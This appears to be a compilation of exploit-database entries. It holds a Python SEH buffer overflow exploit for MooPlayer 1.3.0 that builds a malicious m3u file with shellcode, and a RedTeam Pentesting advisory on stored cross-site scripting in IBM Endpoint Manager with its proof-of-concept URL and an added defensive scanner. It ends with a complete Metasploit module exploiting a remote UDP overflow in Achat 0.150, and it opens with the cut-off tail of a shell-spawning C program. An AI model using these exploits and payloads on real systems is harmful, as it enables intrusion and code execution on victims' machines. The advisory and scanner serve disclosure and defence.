    spawnShell();

    return 0;
}
-
MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)
#!/usr/bin/env python
#################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow      #
# Date Discovered: 10-02-2015                                   #
# Author: dogo h@ck                                             #
# Vulnerable Software: Moo player 1.3.0                         #
# Software Link: https://mooplayer.jaleco.com/                  #
# Version: 1.3.0                                                #
# Tested On: Windows XP SP3                                     #
#################################################################
#BadCharacters = ("\x00\x0a\x0d")                               #
#################################################################

head = "http://"
buffer = 10000
junk = "\x41" * 264
nseh = "\xeb\x06\x90\x90"
seh = "\xe2\x69\xc8\x74"  # 74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll

# Windows XP SP3 English MessageBoxA Shellcode
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
             "\x51\x68\x6c\x6c\x20\x20\x68\x33"
             "\x32\x2e\x64\x68\x75\x73\x65\x72"
             "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"  # 0x7c801d7b ; LoadLibraryA(user32.dll)
             "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
             "\xc1\x11\x11\x11\x11\x51\x68\x61"
             "\x67\x65\x42\x68\x4d\x65\x73\x73"
             "\x89\xe1\x51\x50\xbb\x40\xae\x80"  # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
             "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
             "\x51\x51\x52\xff\xd0\x31\xc0\x50"
             "\xb8\x12\xcb\x81\x7c\xff\xd0")

poc = head + junk + nseh + seh + shellcode
junk1 = "\x44" * (buffer - len(poc))
poc += junk1

file = "payload.m3u"
f = open(file, "w")
f.write(head + poc)
f.close()
-
IBM Endpoint Manager - Persistent Cross-Site Scripting
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint
Manager Relay Diagnostics page allows anybody to persistently store HTML and
JavaScript code that is executed when the page is opened in a browser.

Details
=======

Product: IBM Endpoint Manager
Affected Versions: 9.1.x versions earlier than 9.1.1229,
                   9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE: CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137

Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can help you
achieve smarter, faster endpoint management and security. These products
enable you to see and manage physical and virtual endpoints including servers,
desktops, notebooks, smartphones, tablets and specialized equipment such as
point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly
remediate, protect and report on endpoints in near real time.

(from the vendor's homepage)

More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager,
or TEM) components, such as TEM Root Servers or TEM Relays, typically serve
HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is
normally accessible at the path /rd. That page can be accessed without
authentication and lets users query and modify various information.

For example, a TEM Relay can be instructed to gather a specific version of a
certain Fixlet site by requesting a URL such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code provided
in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list, so
that the embedded JavaScript code is executed whenever the diagnostics page is
opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]
<select NAME="url">
[...]
<option>http://"><script>alert(/XSS/)</script></option>
</select>

Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.

Security Risk
=============

As the relay diagnostics page is typically not frequented by administrators
and does not normally require authentication, it is unlikely that the
vulnerability can be exploited to automatically and reliably attack
administrative users and obtain their credentials. Nevertheless, the ability
to host arbitrary HTML and JavaScript code on the relay diagnostics page,
i.e. on a trusted system, may allow attackers to conduct very convincing
phishing attacks. This vulnerability is therefore rated as a medium risk.

Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests (pentests for short)
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be fixed
immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share
its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                      Tel.: +49 241 510081-0
Dennewartstr. 25-27                          Fax : +49 241 510081-99
52068 Aachen                                 https://www.redteam-pentesting.de
Germany                                      Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
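Two checks a practitioner would want for the stored variant described in the advisory, as an added example (my code, not RedTeam's or IBM's): a scan of a relay's /rd page that lists every entry in the `<select NAME="url">` site list and flags the ones that could never have come from a legitimate gather request, and the server-side validation plus HTML-encoding that the `url` parameter needs. The page excerpt is constructed to match the curl output shown above; the function names, the regular expressions and the set of forbidden characters are assumptions of this example, not details of the product's fix.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed excerpt of a relay's /rd page, shaped like the curl output in
# the advisory: one legitimate site entry and one stored payload.
SAMPLE_RD_PAGE = """<html><body><form>
<select NAME="url">
<option>http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite</option>
<option>http://"><script>alert(/XSS/)</script></option>
</select>
</form></body></html>"""

# Regexes rather than an HTML parser, so that injected markup inside an
# <option> is reported verbatim instead of being parsed away.
SELECT_RE = re.compile(r'<select\s+name="url"\s*>(.*?)</select>', re.I | re.S)
OPTION_RE = re.compile(r'<option[^>]*>(.*?)</option>', re.I | re.S)
FORBIDDEN = set('<>"\'` \t\r\n')   # never part of a legitimate gather URL (assumed policy)


def site_list(page):
    """Raw (unparsed) text of each <option> in the page's <select NAME="url"> list."""
    m = SELECT_RE.search(page)
    return OPTION_RE.findall(m.group(1)) if m else []


def is_valid_gather_url(value):
    """Input-side check for the `url` parameter: http(s), a host name, and no markup characters."""
    if any(c in FORBIDDEN for c in value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def suspicious_entries(page):
    """Stored site entries that no legitimate GatherSpecifiedVersion request would produce."""
    return [v for v in site_list(page) if not is_valid_gather_url(v)]


def render_option(value):
    """Output-side fix: encode the value before placing it in HTML, whatever was stored."""
    return "<option>%s</option>" % html.escape(value, quote=True)


if __name__ == "__main__":
    for entry in suspicious_entries(SAMPLE_RD_PAGE):
        print("suspicious site entry: %r" % entry)
        print("safe rendering:        %s" % render_option(entry))
```

Point `site_list` at the body of `curl http://tem-relay.example.com:52311/rd` to audit a relay that has been exposed without authentication; anything `is_valid_gather_url` rejects is either a stored payload or a malformed entry worth removing.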
-
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits a Unicode SEH-based stack buffer overflow in Achat v0.150.
        By sending a crafted message to the default port 9256 it is possible to
        overwrite the SEH handler. Although the exploit is reliable, it depends on
        timing, since two threads overflow the stack at the same time. This module
        has been tested on Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>',   # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>'    # Exploit, Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops'     => true,
          'Space'           => 730,
          'BadChars'        => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'     => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] # ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2014'))

    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  def exploit
    connect_udp

    # 0055 00       ADD BYTE PTR SS:[EBP],DL  # padding
    # 2A00          SUB AL,BYTE PTR DS:[EAX]  # padding
    # 55            PUSH EBP                  # ebp holds a close pointer to the payload
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 58            POP EAX                   # mov eax, ebp
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 05 00140011   ADD EAX,11001400          # adjusting eax
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 2D 00130011   SUB EAX,11001300          # lea eax, eax+100
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 50            PUSH EAX                  # eax points to the start of the shellcode
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 58            POP EAX                   # padding
    # 0043 00       ADD BYTE PTR DS:[EBX],AL  # padding
    # 59            POP ECX                   # padding
    # 0039          ADD BYTE PTR DS:[ECX],BH  # padding
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit =  'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45   # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40"          # POPAD + INC EAX
    sploit << target.ret          # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00       ADD BYTE PTR DS:[EBX],AL  # padding
    # 55            PUSH EBP                  # ebp with close pointer to payload
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 58            POP EAX                   # put ebp to eax
    # 006E 00       ADD BYTE PTR DS:[ESI],CH  # padding
    # 2A00          SUB AL,BYTE PTR DS:[EAX]  # setting eax to the right place
    # 2A00          SUB AL,BYTE PTR DS:[EAX]  # adjusting eax a little bit more
    # 05 00140011   ADD EAX,11001400          # more adjusting
    # 0043 00       ADD BYTE PTR DS:[EBX],AL  # padding
    # 2D 00130011   SUB EAX,11001300          # lea eax, eax+100
    # 0043 00       ADD BYTE PTR DS:[EBX],AL  # padding
    # 50            PUSH EAX                  # saving eax
    # 0043 00       ADD BYTE PTR DS:[EBX],AL  # padding
    # 5D            POP EBP                   # mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret   # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 - 3)   # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length)           # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    # send in 8192-byte datagrams; slow down once the first message is out so the
    # two receiving threads stay in step
    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end

    disconnect_udp
  end
end